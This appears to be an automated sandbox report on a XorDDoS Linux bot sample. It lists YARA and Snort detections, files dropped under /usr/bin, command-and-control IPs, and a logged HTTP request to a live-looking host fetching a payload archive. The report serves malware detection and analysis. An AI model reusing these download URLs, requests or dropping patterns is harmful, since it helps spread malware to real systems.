Process Memory Space: 1.elf PID: 6513	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6513	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x360d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6516	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6516	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6524	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6524	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3502:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x35df:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6527	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6527	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31e9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x32c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6529	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6529	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6533	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6533	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: 1.elf PID: 6535	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: 1.elf PID: 6535	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d42:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e1f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 772 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin via HTTP - Source IP: 192.168.2.23 - Destination IP: 142.0.138.41

Timestamp:	192.168.2.23142.0.138.4143268802021336 10/26/23-20:30:47.799532
SID:	2021336
Source Port:	43268
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.23 - Destination IP: 142.0.138.44

Timestamp:	192.168.2.23142.0.138.444698615252020381 10/26/23-20:31:08.890920
SID:	2020381
Source Port:	46986
Destination Port:	1525
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1.elf

Avira: detected

Found malware configuration

Source: 1.elf

Malware Configuration Extractor: XorDDoS {"C2 list": []}

Multi AV Scanner detection for submitted file

Source: 1.elf

ReversingLabs: Detection: 86%

Antivirus detection for dropped file

Source: /usr/bin/vlteqhfomz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/lkzqkklpfr	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/vapcvdizxx	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wxysocrflf	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/uaewjndswe	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/efgdvbpuxx	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/nxattrsdxm	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/dyuvutukki	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ezztyrfjzf	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/bjhrrojebv	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ccxfvtbhgr	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ssrfvzfvpk	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/cpbnjarskl	Avira: detection malicious, Label: LINUX/Xorddos.cona

Machine Learning detection for dropped file

Source: /usr/bin/vlteqhfomz	Joe Sandbox ML: detected
Source: /usr/bin/lkzqkklpfr	Joe Sandbox ML: detected
Source: /usr/bin/vapcvdizxx	Joe Sandbox ML: detected
Source: /usr/bin/wxysocrflf	Joe Sandbox ML: detected
Source: /usr/bin/uaewjndswe	Joe Sandbox ML: detected
Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/efgdvbpuxx	Joe Sandbox ML: detected
Source: /usr/bin/nxattrsdxm	Joe Sandbox ML: detected
Source: /usr/bin/dyuvutukki	Joe Sandbox ML: detected
Source: /usr/bin/ezztyrfjzf	Joe Sandbox ML: detected
Source: /usr/bin/bjhrrojebv	Joe Sandbox ML: detected
Source: /usr/bin/ccxfvtbhgr	Joe Sandbox ML: detected
Source: /usr/bin/ssrfvzfvpk	Joe Sandbox ML: detected
Source: /usr/bin/cpbnjarskl	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 1.elf

Joe Sandbox ML: detected

Source: /tmp/1.elf (PID: 6205)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2021336 ET TROJAN DDoS.XOR Checkin via HTTP 192.168.2.23:43268 -> 142.0.138.41:80
Source: Traffic	Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:46986 -> 142.0.138.44:1525

Source: global traffic	TCP traffic: 192.168.2.23:54826 -> 34.98.99.30:1525
Source: global traffic	TCP traffic: 192.168.2.23:39860 -> 142.4.106.74:1525
Source: global traffic	TCP traffic: 192.168.2.23:46986 -> 142.0.138.44:1525

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Source: 1.elf, vlteqhfomz.11.dr, lkzqkklpfr.11.dr, vapcvdizxx.11.dr, wxysocrflf.11.dr, uaewjndswe.11.dr, libudev.so.11.dr, efgdvbpuxx.11.dr, nxattrsdxm.11.dr, dyuvutukki.11.dr, ezztyrfjzf.11.dr, bjhrrojebv.11.dr, ccxfvtbhgr.11.dr, ssrfvzfvpk.11.dr, cpbnjarskl.11.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html
Source: 1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar
Source: 1.elf, 6204.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6206.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6207.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6208.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9/t
Source: 1.elf, 6488.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6491.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6494.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6496.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6499.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bh
Source: 1.elf, 6419.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6422.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6424.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6427.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6430.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9bj
Source: 1.elf, 6238.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6241.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6244.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6246.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6249.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cc
Source: 1.elf, 6346.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6349.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6351.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6354.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6357.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9cp
Source: 1.elf, 6505.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6508.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6510.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6513.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6516.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ct
Source: 1.elf, 6274.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6277.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6279.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6282.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6285.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9dy
Source: 1.elf, 6382.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6385.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6388.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6390.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6393.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ef
Source: 1.elf, 6257.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6260.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6263.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6265.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6268.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ez
Source: 1.elf, 6524.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6527.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6529.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6533.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6535.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gg
Source: 1.elf, 6542.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6545.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9gv
Source: 1.elf, 6329.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6332.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6335.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6337.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6340.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9lk
Source: 1.elf, 6402.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6405.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6408.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6411.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6414.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9nx
Source: 1.elf, 6470.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6473.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6475.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6478.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6482.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ss
Source: 1.elf, 6363.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6366.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6368.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6371.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6374.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ua
Source: 1.elf, 6312.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6315.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6317.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6320.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6323.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9va
Source: 1.elf, 6436.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6439.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6441.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6444.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6447.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9vl
Source: 1.elf, 6453.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6456.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6458.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6461.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp, 1.elf, 6464.1.00000000ffdfc000.00000000ffe1d000.rw-.sdmp	String found in binary or memory: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9wx

Source: unknown

DNS traffic detected: queries for: www1.gggatat456.com

Source: global traffic

HTTP traffic detected: GET /dd.rar HTTP/1.1Accept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)Host: www1.gggatat456.comConnection: Keep-Alive

DDoS

Yara detected XorDDoS Bot

Source: Yara match	File source: 1.elf, type: SAMPLE
Source: Yara match	File source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6208.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6402.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6374.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6453.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6408.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6405.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6390.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6366.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6207.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6513.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6482.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6436.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6346.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6427.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6422.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6470.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6414.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6473.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6354.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6206.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6277.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6206, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6207, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6208, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6238, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6249, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6257, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6260, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6263, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6265, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6274, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6277, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6279, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6282, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6285, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1.elf PID: 6312, type: MEMORYSTR
